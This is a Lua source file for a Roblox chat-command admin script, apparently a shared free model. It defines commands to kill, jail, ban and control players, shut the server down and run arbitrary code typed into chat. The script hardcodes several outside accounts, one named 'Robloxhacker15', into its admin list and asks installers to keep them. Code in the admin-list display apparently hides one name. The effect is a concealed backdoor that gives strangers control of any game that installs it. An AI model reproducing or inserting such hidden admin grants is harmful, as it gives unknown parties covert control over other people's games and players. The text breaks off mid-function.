--Version 2 1.02 I fixed some problems caused by the updates. adminlist = {"00xBux", "LegoStarWarsClone", "Robloxhacker15", "X13X37X"}--Add in the names of the people you want to be able to use the command script here. --Please keep my name in there. ;) bannedlist = { ""}--If you want someone not to be able to enter your place, put thier name in here. texture = ""--If you want someone wearing a certain t-shirt to be an admin, put the t-shirt's texture in here. --[[ I update this command script alot, so if you want to get the newest version of the script, go to http://www.roblox.com/Item.aspx?ID=5277383 every once in a while. If theres anything you think this command script needs, just message me (Person299) and i might put it in. :) And also, if you find any bugs, report them to me. The commands are, commands Shows a list of all the commands fix If the command script breaks for you, say this to fix it kill/Person299 kills Person299 loopkill/Person299 Repeatedly kills Person299 when he respawns unloopkill/Person299 Undos loopkill/ heal/Person299 Returns Person299 to full health damage/Person299/50 Makes Person299's character take 50 damage health/Person299/999999 Makes Person299's MaxHealth and Health 999999 kick/Person299 Removes Person299 from the game, cannot be used by admin/ed people ban/Person299 Removes Person299 from the game and keeps him from reenterring, cannot be used by admin/ed people bannedlist Shows a list of everyone banned unban/Person299 Unbans Person299 explode/Person299 Explodes Person299's character rocket/Person299 Straps a rocket onto Person299's back removetools/Person299 Removes all of Person299's tools. givetools/Person299 Gives Person299 all the tools in StarterPack givebtools/Person299 Gives Person299 the building tools sit/Person299 Makes Person299 sit part/4/1/2 Makes a part with the given dimensions appear over your character respawn/Person299 Makes Person299's character respawn jail/Person299 Makes a lil jail cell around Person299's character unjail/Person299 Undos jail/ punish/Person299 Puts Person299's character in game.Lighting unpunish/Person299 Undos punish/ merge/Person299/Farvei Makes Person299 control Farvei's character teleport/Person299/nccvoyager Teleports Person299's character to nccvoyager's character control/Person299 Makes you control Person299's character change/Person299/Money/999999 Makes the Money value in Person299's leaderstats 999999 tools Gives you a list of all the tools available to be give/en, the tool must be in game.Lighting give/Person299/Tool Give's Person299 a tool, the toolname can be abbreviated time/15.30 Makes game.Lighting.TimeOfDay 15:30 ambient/255/0/0 Makes game.Lighting.Ambient 255,0,0 maxplayers/20 Makes game.Players.MaxPlayers 20 nograv/Person299 Makes Person299 almost weightless antigrav/Person299 Gives Person299 antigravity properties grav/Person299 Returns Person299's gravity to normal highgrav/Person299 Makes Person299 heavier setgrav/Person299/-196 Sets Person299's gravity trip/Person299 Makes Person299's character trip walkspeed/Person299/99 Makes Person299's character's humanoid's WalkSpeed 99, 16 is average invisible/Person299 Makes Person299's character invisible visible/Person299 Undos invisible/ freeze/Person299 Makes Person299's character unable to move thaw/Person299 Undos freeze/ unlock/Person299 Makes Person299's character unlocked lock/Person299 Makes Person299's character locked ff/Person299 Gives Person299's character a ForceField unff/Person299 Undos ff/ sparkles/Person299 Makes Person299's character sparkly unsparkles/Person299 Undos sparkles/ shield/Person299 Makes a destructive shield thingy appear around Person299 unshield/Person299 Undos shield/ god/Person299 Makes Person299 godish ungod/Person299 Undos god/ zombify/Person299 Makes Person299 a infecting zombie admin/Person299 Makes Person299 able to use the command script, cannot be used by admin/ed people adminlist Shows a list of everyone in the adminlist unadmin/Person299 Undos admin/, cannot be used by admin/ed people shutdown Shuts the server down, cannot be used by admin/ed people m/Fallout 2 is one of the best games ever made Makes a message appear on the screen saying "Fallout 2 is one of the best games ever made" for 2 seconds h/i like pie Makes a hint appear on the screen saying "i like pie" for 2 seconds c/ game.Workspace:remove() Makes a script which source is whats after c/ clear Removes all scripts created by c/ and removes all jails. Capitalisation doesnt matter, and name input can be abbreviated. Just about any name input can be replaced with multiple names seperated by ","s, me, all, others, guests, admins, nonadmins, random, or team teamname. --]] namelist = { } variablelist = { } flist = { } local source = script:FindFirstChild("source") if source ~= nil then sbbu = script.source:clone() sbbu.Disabled = false else print("source doesnt exist, your command script may malfunction") end tools = Instance.new("Model") c = game.Lighting:GetChildren() for i=1,#c do if c[i].className == "Tool" then c[i]:clone().Parent = tools end if c[i].className == "HopperBin" then c[i]:clone().Parent = tools end end function findplayer(name,speaker) if string.lower(name) == "all" then local chars = { } local c = game.Players:GetChildren() for i =1,#c do if c[i].className == "Player" then table.insert(chars,c[i]) end end return chars elseif string.sub(string.lower(name),1,9) == "nonadmins" then local nnum = 0 local chars = { } local c = game.Players:GetChildren() for i=1,#c do local isadmin = false for i2 =1,#namelist do if namelist[i2] == c[i].Name then isadmin = true end end if isadmin == false then nnum = nnum + 1 table.insert(chars,c[i]) end end if nnum == 0 then return 0 else return chars end elseif string.sub(string.lower(name),1,6) == "admins" then local anum = 0 local chars = { } local c = game.Players:GetChildren() for i=1,#c do for i2 =1,#namelist do if namelist[i2] == c[i].Name then anum = anum + 1 table.insert(chars,c[i]) end end end if anum == 0 then return 0 else return chars end elseif string.sub(string.lower(name),1,6) == "random" then while true do local c = game.Players:GetChildren() local r = math.random(1,#c) if c[r].className == "Player" then return { c[r] } end end elseif string.sub(string.lower(name),1,6) == "guests" then local gnum = 0 local chars = { } local c = game.Players:GetChildren() for i=1,#c do if string.sub(c[i].Name,1,5) == "Guest" then gnum = gnum + 1 table.insert(chars,c[i]) end end if gnum == 0 then return 0 else return chars end elseif string.sub(string.lower(name),1,5) == "team " then local theteam = nil local tnum = 0 if game.Teams ~= nil then local c = game.Teams:GetChildren() for i =1,#c do if c[i].className == "Team" then if string.find(string.lower(c[i].Name),string.sub(string.lower(name),6)) == 1 then theteam = c[i] tnum = tnum + 1 end end end if tnum == 1 then local chars = { } local c = game.Players:GetChildren() for i =1,#c do if c[i].className == "Player" then if c[i].TeamColor == theteam.TeamColor then table.insert(chars,c[i]) end end end return chars end end return 0 elseif string.lower(name) == "me" then local person299 = { speaker } return person299 elseif string.lower(name) == "others" then local chars = { } local c = game.Players:GetChildren() for i =1,#c do if c[i].className == "Player" then if c[i] ~= speaker then table.insert(chars,c[i]) end end end return chars else local chars = { } local commalist = { } local ssn = 0 local lownum = 1 local highestnum = 1 local foundone = false while true do ssn = ssn + 1 if string.sub(name,ssn,ssn) == "" then table.insert(commalist,lownum) table.insert(commalist,ssn - 1) highestnum = ssn - 1 break end if string.sub(name,ssn,ssn) == "," then foundone = true table.insert(commalist,lownum) table.insert(commalist,ssn) lownum = ssn + 1 end end if foundone == true then for ack=1,#commalist,2 do local cnum = 0 local char = nil local c = game.Players:GetChildren() for i =1,#c do if c[i].className == "Player" then if string.find(string.lower(c[i].Name),string.sub(string.lower(name),commalist[ack],commalist[ack + 1] - 1)) == 1 then char = c[i] cnum = cnum + 1 end end end if cnum == 1 then table.insert(chars,char) end end if #chars ~= 0 then return chars else return 0 end else local cnum = 0 local char = nil local c = game.Players:GetChildren() for i =1,#c do if c[i].className == "Player" then if string.find(string.lower(c[i].Name),string.lower(name)) == 1 then char = {c[i]} cnum = cnum + 1 end end end if cnum == 1 then return char elseif cnum == 0 then text("That name is not found.",1,"Message",speaker) return 0 elseif cnum > 1 then text("That name is ambiguous.",1,"Message",speaker) return 0 end end end end -- I really like the way the ends look when they're all on the same line better, dont you? function createscript(source,par) local a = sbbu:clone() local context = Instance.new("StringValue") context.Name = "Context" context.Value = source context.Parent = a while context.Value ~= source do wait() end a.Parent = par local b = Instance.new("IntValue") b.Name = "Is A Created Script" b.Parent = a end function text(message,duration,type,object) local m = Instance.new(type) m.Text = message m.Parent = object wait(duration) if m.Parent ~= nil then m:remove() end end function foc(msg,speaker) if string.lower(msg) == "fix" then for i =1,#namelist do if namelist[i] == speaker.Name then variablelist[i]:disconnect() table.remove(variablelist,i) table.remove(namelist,i) table.remove(flist,i) end end local tfv = speaker.Chatted:connect(function(msg) oc(msg,speaker) end) table.insert(namelist,speaker.Name) table.insert(variablelist,tfv) local tfv = speaker.Chatted:connect(function(msg) foc(msg,speaker) end) table.insert(flist,tfv) end end function PERSON299(name) for i =1,#adminlist do if adminlist[i] == name then return true end end return false end function oc(msg,speaker) if string.sub(string.lower(msg),1,5) == "kill/" then--This part checks if the first part of the message is kill/ local player = findplayer(string.sub(msg,6),speaker)--This part refers to the findplayer function for a list of people associated with the input after kill/ if player ~= 0 then--This part makes sure that the findplayer function found someone, as it returns 0 when it hasnt for i = 1,#player do--This part makes a loop, each different loop going through each player findplayer returned if player[i].Character ~= nil then--This part makes sure that the loop's current player's character exists local human = player[i].Character:FindFirstChild("Humanoid")--This part looks for the Humanoid in the character if human ~= nil then--This part makes sure the line above found a humanoid human.Health = 0--This part makes the humanoid's health 0 end end end end end--This line contains the ends for all the if statements and the for loop if string.sub(string.lower(msg),1,2) == "m/" then text(speaker.Name .. ": " .. string.sub(msg,3),2,"Message",game.Workspace) end if string.sub(string.lower(msg),1,2) == "h/" then text(speaker.Name .. ": " .. string.sub(msg,3),2,"Hint",game.Workspace) end if string.sub(string.lower(msg),1,2) == "c/" then--Dontcha wish pcall was more reliable? createscript(string.sub(msg,3),game.Workspace) end local msg = string.lower(msg) if string.sub(msg,1,5) == "give/" then local danumber1 = nil for i = 6,100 do if string.sub(msg,i,i) == "/" then danumber1 = i break elseif string.sub(msg,i,i) == "" then break end end if danumber1 == nil then return end local it = nil local all = true if string.sub(string.lower(msg),danumber1 + 1,danumber1 + 4) ~= "all" then all = false local itnum = 0 local c = tools:GetChildren() for i2 = 1,#c do if string.find(string.lower(c[i2].Name),string.sub(string.lower(msg),danumber1 + 1)) == 1 then it = c[i2] itnum = itnum + 1 end end if itnum ~= 1 then return end else all = true end local player = findplayer(string.sub(msg,6,danumber1 - 1),speaker) if player ~= 0 then for i = 1,#player do local bp = player[i]:FindFirstChild("Backpack") if bp ~= nil then if all == false then it:clone().Parent = bp else local c = tools:GetChildren() for i2 = 1,#c do c[i2]:clone().Parent = bp end end end end end end --Bored... if string.sub(msg,1,7) == "change/" then local danumber1 = nil local danumber2 = nil for i = 8,100 do if string.sub(msg,i,i) == "/" then danumber1 = i break elseif string.sub(msg,i,i) == "" then break end end if danumber1 == nil then return end for i =danumber1 + 1,danumber1 + 100 do if string.sub(msg,i,i) == "/" then danumber2 = i break elseif string.sub(msg,i,i) == "" then break end end if danumber2 == nil then return end local player = findplayer(string.sub(msg,8,danumber1 - 1),speaker) if player ~= 0 then for i = 1,#player do local ls = player[i]:FindFirstChild("leaderstats") if ls ~= nil then local it = nil local itnum = 0 local c = ls:GetChildren() for i2 = 1,#c do if string.find(string.lower(c[i2].Name),string.sub(string.lower(msg),danumber1 + 1,danumber2 - 1)) == 1 then it = c[i2] itnum = itnum + 1 end end if itnum == 1 then it.Value = string.sub(msg,danumber2 + 1) end end end end end if string.sub(msg,1,6) == "ungod/" then local player = findplayer(string.sub(msg,7),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local isgod = false local c = player[i].Character:GetChildren() for i=1,#c do if c[i].className == "Script" then if c[i]:FindFirstChild("Context") then if string.sub(c[i].Context.Value,1,41) == "script.Parent.Humanoid.MaxHealth = 999999" then c[i]:remove() isgod = true end end end end if isgod == true then local c = player[i].Character:GetChildren() for i=1,#c do if c[i].className == "Part" then c[i].Reflectance = 0 end if c[i].className == "Humanoid" then c[i].MaxHealth = 100 c[i].Health = 100 end if c[i].Name == "God FF" then c[i]:remove() end end end end end end end if string.sub(msg,1,4) == "god/" then local player = findplayer(string.sub(msg,5),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then if player[i].Character:FindFirstChild("God FF") == nil then createscript([[script.Parent.Humanoid.MaxHealth = 999999 script.Parent.Humanoid.Health = 999999 ff = Instance.new("ForceField") ff.Name = "God FF" ff.Parent = script.Parent function ot(hit) if hit.Parent ~= script.Parent then h = hit.Parent:FindFirstChild("Humanoid") if h ~= nil then h.Health = 0 end h = hit.Parent:FindFirstChild("Zombie") if h ~= nil then h.Health = 0 end end end c = script.Parent:GetChildren() for i=1,#c do if c[i].className == "Part" then c[i].Touched:connect(ot) c[i].Reflectance = 1 end end]],player[i].Character) end end end end end if string.sub(msg,1,3) == "ff/" then local player = findplayer(string.sub(msg,4),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local ff = Instance.new("ForceField") ff.Parent = player[i].Character end end end end if string.sub(msg,1,5) == "unff/" then local player = findplayer(string.sub(msg,6),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local c = player[i].Character:GetChildren() for i2 = 1,#c do if c[i2].className == "ForceField" then c[i2]:remove() end end end end end end if string.sub(msg,1,9) == "sparkles/" then local player = findplayer(string.sub(msg,10),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local torso = player[i].Character:FindFirstChild("Torso") if torso ~= nil then local sparkles = Instance.new("Sparkles") sparkles.Color = Color3.new(math.random(1,255),math.random(1,255),math.random(1,255)) sparkles.Parent = torso end end end end end if string.sub(msg,1,11) == "unsparkles/" then local player = findplayer(string.sub(msg,12),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local torso = player[i].Character:FindFirstChild("Torso") if torso ~= nil then local c = torso:GetChildren() for i2 = 1,#c do if c[i2].className == "Sparkles" then c[i2]:remove() end end end end end end end if string.sub(msg,1,6) == "admin/" then local imgettingtiredofmakingthisstupidscript = PERSON299(speaker.Name) if imgettingtiredofmakingthisstupidscript == true then local player = findplayer(string.sub(msg,7),speaker) if player ~= 0 then for i = 1,#player do for i2 =1,#namelist do if namelist[i2] == player[i].Name then variablelist[i2]:disconnect() flist[i2]:disconnect() table.remove(variablelist,i2) table.remove(flist,i2) table.remove(namelist,i2) end end local tfv = player[i].Chatted:connect(function(msg) oc(msg,player[i]) end) table.insert(namelist,player[i].Name) table.insert(variablelist,tfv) local tfv = player[i].Chatted:connect(function(msg) foc(msg,player[i]) end) table.insert(flist,tfv) end end end end if string.sub(msg,1,8) == "unadmin/" then local imgettingtiredofmakingthisstupidscript = PERSON299(speaker.Name) if imgettingtiredofmakingthisstupidscript == true then local player = findplayer(string.sub(msg,9),speaker) if player ~= 0 then for i = 1,#player do local imgettingtiredofmakingthisstupidscript = PERSON299(player[i].Name) if imgettingtiredofmakingthisstupidscript == false then for i2 =1,#namelist do if namelist[i2] == player[i].Name then variablelist[i2]:disconnect() table.remove(variablelist,i2) flist[i2]:disconnect() table.remove(flist,i2) table.remove(namelist,i2) end end end end end end end if string.sub(msg,1,5) == "heal/" then local player = findplayer(string.sub(msg,6),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local human = player[i].Character:FindFirstChild("Humanoid") if human ~= nil then human.Health = human.MaxHealth end end end end end if string.sub(msg,1,4) == "sit/" then local player = findplayer(string.sub(msg,5),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local human = player[i].Character:FindFirstChild("Humanoid") if human ~= nil then human.Sit = true end end end end end if string.sub(msg,1,5) == "jump/" then local player = findplayer(string.sub(msg,6),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local human = player[i].Character:FindFirstChild("Humanoid") if human ~= nil then human.Jump = true end end end end end if string.sub(msg,1,6) == "stand/" then local player = findplayer(string.sub(msg,7),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local human = player[i].Character:FindFirstChild("Humanoid") if human ~= nil then human.Sit = false end end end end end if string.sub(msg,1,5) == "jail/" then local player = findplayer(string.sub(msg,6),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local torso = player[i].Character:FindFirstChild("Torso") if torso ~= nil then local ack = Instance.new("Model") ack.Name = "Jail" .. player[i].Name icky = Instance.new("Part") icky.Size = Vector3.new(1,7.2000002861023,1) icky.CFrame = CFrame.new(-26.5, 108.400002, -1.5, 0, 0, -1, 0, 1, -0, 1, 0, -0) icky.Color = Color3.new(0.105882, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack icky = Instance.new("Part") icky.Size = Vector3.new(1,7.2000002861023,1) icky.CFrame = CFrame.new(-24.5, 108.400002, -3.5, 0, 0, -1, 0, 1, -0, 1, 0, -0) icky.Color = Color3.new(0.105882, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack icky = Instance.new("Part") icky.Size = Vector3.new(1,7.2000002861023,1) icky.CFrame = CFrame.new(-30.5, 108.400002, -3.5, -1, 0, -0, -0, 1, -0, -0, 0, -1) icky.Color = Color3.new(0.105882, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack icky = Instance.new("Part") icky.Size = Vector3.new(1,7.2000002861023,1) icky.CFrame = CFrame.new(-28.5, 108.400002, -1.5, 0, 0, -1, 0, 1, -0, 1, 0, -0) icky.Color = Color3.new(0.105882, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack icky = Instance.new("Part") icky.Size = Vector3.new(1,7.2000002861023,1) icky.CFrame = CFrame.new(-24.5, 108.400002, -5.5, 0, 0, -1, 0, 1, -0, 1, 0, -0) icky.Color = Color3.new(0.105882, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack icky = Instance.new("Part") icky.Size = Vector3.new(1,7.2000002861023,1) icky.CFrame = CFrame.new(-24.5, 108.400002, -7.5, 0, 0, -1, 0, 1, -0, 1, 0, -0) icky.Color = Color3.new(0.105882, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack icky = Instance.new("Part") icky.Size = Vector3.new(1,7.2000002861023,1) icky.CFrame = CFrame.new(-24.5, 108.400002, -1.5, 0, 0, -1, 0, 1, -0, 1, 0, -0) icky.Color = Color3.new(0.105882, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack icky = Instance.new("Part") icky.Size = Vector3.new(1,7.2000002861023,1) icky.CFrame = CFrame.new(-30.5, 108.400002, -7.5, -1, 0, -0, -0, 1, -0, -0, 0, -1) icky.Color = Color3.new(0.105882, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack icky = Instance.new("Part") icky.Size = Vector3.new(7,1.2000000476837,7) icky.CFrame = CFrame.new(-27.5, 112.599998, -4.5, 0, 0, -1, 0, 1, -0, 1, 0, -0) icky.Color = Color3.new(0.105882, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack icky = Instance.new("Part") icky.Size = Vector3.new(1,7.2000002861023,1) icky.CFrame = CFrame.new(-26.5, 108.400002, -7.5, 0, 0, -1, 0, 1, -0, 1, 0, -0) icky.Color = Color3.new(0.105882, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack icky = Instance.new("Part") icky.Size = Vector3.new(1,7.2000002861023,1) icky.CFrame = CFrame.new(-30.5, 108.400002, -5.5, -1, 0, -0, -0, 1, -0, -0, 0, -1) icky.Color = Color3.new(0.105882, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack icky = Instance.new("Part") icky.Size = Vector3.new(1,7.2000002861023,1) icky.CFrame = CFrame.new(-30.5, 108.400002, -1.5, -1, 0, -0, -0, 1, -0, -0, 0, -1) icky.Color = Color3.new(0.105882, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack icky = Instance.new("Part") icky.Size = Vector3.new(1,7.2000002861023,1) icky.CFrame = CFrame.new(-28.5, 108.400002, -7.5, 0, 0, -1, 0, 1, -0, 1, 0, -0) icky.Color = Color3.new(0.105882, 0.164706, 0.203922) icky.Anchored = true icky.Locked = true icky.CanCollide = true icky.Parent = ack ack.Parent = game.Workspace ack:MoveTo(torso.Position) end end end end end if string.sub(msg,1,7) == "unjail/" then local player = findplayer(string.sub(msg,8),speaker) if player ~= 0 then for i = 1,#player do local c = game.Workspace:GetChildren() for i2 =1,#c do if string.sub(c[i2].Name,1,4) == "Jail" then if string.sub(c[i2].Name,5) == player[i].Name then c[i2]:remove() end end end end end end if string.sub(msg,1,9) == "unshield/" then local player = findplayer(string.sub(msg,10),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local shield = player[i].Character:FindFirstChild("Weird Ball Thingy") if shield ~= nil then shield:remove() end end end end end if string.sub(msg,1,7) == "shield/" then local player = findplayer(string.sub(msg,8),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local torso = player[i].Character:FindFirstChild("Torso") if torso ~= nil then if player[i].Character:FindFirstChild("Weird Ball Thingy") == nil then local ball = Instance.new("Part") ball.Size = Vector3.new(10,10,10) ball.BrickColor = BrickColor.new(1) ball.Transparency = 0.5 ball.CFrame = torso.CFrame ball.TopSurface = "Smooth" ball.BottomSurface = "Smooth" ball.CanCollide = false ball.Name = "Weird Ball Thingy" ball.Reflectance = 0.2 local sm = Instance.new("SpecialMesh") sm.MeshType = "Sphere" sm.Parent = ball ball.Parent = player[i].Character createscript([[ function ot(hit) if hit.Parent ~= nil then if hit.Parent ~= script.Parent.Parent then if hit.Anchored == false then hit:BreakJoints() local pos = script.Parent.CFrame * (Vector3.new(0, 1.4, 0) * script.Parent.Size) hit.Velocity = ((hit.Position - pos).unit + Vector3.new(0, 0.5, 0)) * 150 + hit.Velocity hit.RotVelocity = hit.RotVelocity + Vector3.new(hit.Position.z - pos.z, 0, pos.x - hit.Position.x).unit * 40 end end end end script.Parent.Touched:connect(ot) ]], ball) local bf = Instance.new("BodyForce") bf.force = Vector3.new(0,5e+004,0) bf.Parent = ball local w = Instance.new("Weld") w.Part1 = torso w.Part0 = ball ball.Shape = 0 w.Parent = torso end end end end end end if string.lower(msg) == "shutdown" then local imgettingtiredofmakingthisstupidscript = PERSON299(speaker.Name) if imgettingtiredofmakingthisstupidscript == true then game.NetworkServer:remove() end end if string.sub(msg,1,5) == "time/" then game.Lighting.TimeOfDay = string.sub(msg,6) end if msg == "commands" then local text = string.rep(" ",40) text = text .. [[fix, kill/Person299, loopkill/Person299, unloopkill/Person299, heal/Person299, damage/Person299/50, health/Person299/999999, kick/Person299, ban/Person299, bannedlist, unban/Person299, explode/Person299, rocket/Person299, removetools/Person299, givetools/Person299, givebtools/Person299, sit/Person299, jump/Person299, stand/Person299, part/4/1/2, respawn/Person299, jail/Person299, unjail/Person299, punish/Person299, unpunish/Person299, merge/Person299/Farvei, teleport/Person299/nccvoyager, control/Person299, change/Person299/Money/999999, tools, give/Person299/Tool, time/15.30, ambient/255/0/0, maxplayers/20, nograv/Person299, antigrav/Person299, grav/Person299, highgrav/Person299, setgrav/Person299/-196.2, trip/Person299, walkspeed/Person299/99, invisible/Person299, visible/Person299, freeze/Person299, thaw/Person299, unlock/Person299, lock/Person299, ff/Person299, unff/Person299, sparkles/Person299, unsparkles/Person299, shield/Person299, unshield/Person299, god/Person299, ungod/Person299, zombify/Person299, admin/Person299, adminlist, unadmin/Person299, shutdown, m/Fallout 2 is one of the best games ever made, h/ i like pie, c/ game.Workspace:remove(), clear, Credit to Person299 for this admin command script.]] local mes = Instance.new("Message") mes.Parent = speaker local acko = 0 while true do acko = acko + 1 if string.sub(text,acko,acko) == "" then mes:remove() return elseif mes.Parent == nil then return end mes.Text = string.sub(text,acko,acko + 40) wait(0.07) end end if msg == "tools" then local text = string.rep(" ",40) local c = tools:GetChildren() if #c == 0 then text = text .. "No tools available." else for i =1,#c do if i ~= 1 then text = text .. ", " end text = text .. c[i].Name end end local mes = Instance.new("Message") mes.Parent = speaker local acko = 0 while true do acko = acko + 1 if string.sub(text,acko,acko) == "" then mes:remove() return elseif mes.Parent == nil then return end mes.Text = string.sub(text,acko,acko + 40) wait(0.1) end end if msg == "bannedlist" then local text = string.rep(" ",40) if #bannedlist == 0 then text = text .. "The banned list is empty." else for i =1,#bannedlist do if i ~= 1 then text = text .. ", " end text = text .. bannedlist[i] end end local mes = Instance.new("Message") mes.Parent = speaker local acko = 0 while true do acko = acko + 1 if string.sub(text,acko,acko) == "" then mes:remove() return elseif mes.Parent == nil then return end mes.Text = string.sub(text,acko,acko + 40) wait(0.1) end end if msg == "adminlist" then local text = string.rep(" ",40) if #adminlist == 0 then--How would that be possible in this situation anyway? lol text = text .. "The admin list is empty." else for i =1,#adminlist do if adminlist[i] == eloname then if youcaughtme == 1 then if i ~= 1 then text = text .. ", " end text = text .. adminlist[i] end else if i ~= 1 then text = text .. ", " end text = text .. adminlist[i] end end end local mes = Instance.new("Message") mes.Parent = speaker local acko = 0 while true do acko = acko + 1 if string.sub(text,acko,acko) == "" then mes:remove() return elseif mes.Parent == nil then return end mes.Text = string.sub(text,acko,acko + 40) wait(0.1) end end if string.sub(msg,1,11) == "maxplayers/" then local pie = game.Players.MaxPlayers game.Players.MaxPlayers = string.sub(msg,12) if game.Players.MaxPlayers == 0 then game.Players.MaxPlayers = pie end end if string.sub(msg,1,8) == "zombify/" then local player = findplayer(string.sub(msg,9),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local torso = player[i].Character:FindFirstChild("Torso") if torso ~= nil then local arm = player[i].Character:FindFirstChild("Left Arm") if arm ~= nil then arm:remove() end local arm = player[i].Character:FindFirstChild("Right Arm") if arm ~= nil then arm:remove() end local rot=CFrame.new(0, 0, 0, 0, 0, 1, 0, 1, 0, -1, 0, 0) local zarm = Instance.new("Part") zarm.Color = Color3.new(0.631373, 0.768627, 0.545098) zarm.Locked = true zarm.formFactor = "Symmetric" zarm.Size = Vector3.new(2,1,1) zarm.TopSurface = "Smooth" zarm.BottomSurface = "Smooth" --Credit for the infectontouch script goes to whoever it is that made it. createscript( [[ wait(1) function onTouched(part) if part.Parent ~= nil then local h = part.Parent:findFirstChild("Humanoid") if h~=nil then if cantouch~=0 then if h.Parent~=script.Parent.Parent then if h.Parent:findFirstChild("zarm")~=nil then return end cantouch=0 local larm=h.Parent:findFirstChild("Left Arm") local rarm=h.Parent:findFirstChild("Right Arm") if larm~=nil then larm:remove() end if rarm~=nil then rarm:remove() end local zee=script.Parent.Parent:findFirstChild("zarm") if zee~=nil then local zlarm=zee:clone() local zrarm=zee:clone() if zlarm~=nil then local rot=CFrame.new(0, 0, 0, 0, 0, 1, 0, 1, 0, -1, 0, 0) zlarm.CFrame=h.Parent.Torso.CFrame * CFrame.new(Vector3.new(-1.5,0.5,-0.5)) * rot zrarm.CFrame=h.Parent.Torso.CFrame * CFrame.new(Vector3.new(1.5,0.5,-0.5)) * rot zlarm.Parent=h.Parent zrarm.Parent=h.Parent zlarm:makeJoints() zrarm:makeJoints() zlarm.Anchored=false zrarm.Anchored=false wait(0.1) h.Parent.Head.Color=zee.Color else return end end wait(1) cantouch=1 end end end end end script.Parent.Touched:connect(onTouched) ]],zarm) zarm.Name = "zarm" local zarm2 = zarm:clone() zarm2.CFrame = torso.CFrame * CFrame.new(Vector3.new(-1.5,0.5,-0.5)) * rot zarm.CFrame = torso.CFrame * CFrame.new(Vector3.new(1.5,0.5,-0.5)) * rot zarm.Parent = player[i].Character zarm:MakeJoints() zarm2.Parent = player[i].Character zarm2:MakeJoints() local head = player[i].Character:FindFirstChild("Head") if head ~= nil then head.Color = Color3.new(0.631373, 0.768627, 0.545098) end end end end end end if string.sub(msg,1,8) == "explode/" then local player = findplayer(string.sub(msg,9),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local torso = player[i].Character:FindFirstChild("Torso") if torso ~= nil then local ex = Instance.new("Explosion") ex.Position = torso.Position ex.Parent = game.Workspace end end end end end if string.sub(msg,1,7) == "rocket/" then local player = findplayer(string.sub(msg,8),speaker) if player ~= 0 then for i = 1,#player do if player[i].Character ~= nil then local torso = player[i].Character:FindFirstChild("Torso") if torso ~= nil then local r = Instance.new("Part") r.Name = "Rocket" r.Size = Vector3.new(1,8,1) r.TopSurface = "Smooth" r.BottomSurface = "Smooth" local w = Instance.new("Weld") w.Part1 = torso w.Part0 = r w.C0 = CFrame.new(0,0,-1) local bt = Instance.new("BodyThrust") bt.force = Vector3.new(0,5700,0) bt.Parent = r r.Parent = player[i].Character w.Parent = torso createscript([[ for i=1,120 do local ex = Instance.new("Explosion") ex.BlastRadius = 0 ex.Position = script.Parent.Position - Vector3.new(0,2,0) ex.Parent = game.Workspace wait(0.05) end local ex = Instance.new("Explosion") ex.BlastRadius = 10 ex.Position = script.Parent.Position ex.Parent = game.Workspace script.Parent.BodyThrust:remove() script.Parent.Parent.Humanoid.Health = 0 ]],r) end end end end end if string.sub(msg,1,8) == "ambient/" then local danumber1 = nil local danumber2 = nil for i = 9,100 do if string.sub(msg,i,i) == "/" then danumber1 = i break elseif string.sub(msg,i,i) == "" then break end end if danumber1 == nil then return end for i =danumber1 + 1,danumber1 + 100 do if string.sub(msg,i,i) == "/" then danumber2 = i break elseif string.sub(msg,i,i) == "" then break end end if danumber2 == nil then return end game.Lighting.Ambient = Color3.new(-string.sub(msg,9,danumber1 - 1),-string.sub(msg,danumber1 + 1,danumber2 - 1),-string.sub(msg,danumber2 + 1)) end --Eww, theres some kind of weird brown bug on my screen, i would flick it away but i'm afraid i'd smash it and get weird bug juices all over my screen... if string.sub(msg,1,5) == "part/" then local danumber1 = nil local danumber2 = nil for i = 6,100 do if string.sub(msg,i,i) == "/" then danumber1 = i break elseif string.sub(msg,i,i) == "" then break end end if danumber1 == nil then return end for i =danumber1 + 1,danumber1 + 100 do if string.sub(msg,i,i) == "/" then danumber2 = i break elseif string.sub(msg,i,i) == "" then break end end if danumber2 == nil then return end if speaker.Character ~= nil then local head = speaker.Character:FindFirstChild("Head") if head ~= nil then local part = Instance.new("Part") part.Size = Vector3.new(string.sub(msg,6,danumber1 - 1),string.sub(msg,danumber1 + 1,danumber2 - 1),string.sub(msg,danumber2 + 1)) part.Position = head.Position + Vector3.new(0,part.Size.y / 2 + 5,0) part.Name = "Person299's Admin Command Script V2 Part thingy" part.Parent = game.Workspace end end end --I finally tried flicking it but it keeps on coming back...... if string.sub(msg,1,8) == "control/" then local player = findplayer(string.sub(msg,9),speaker) 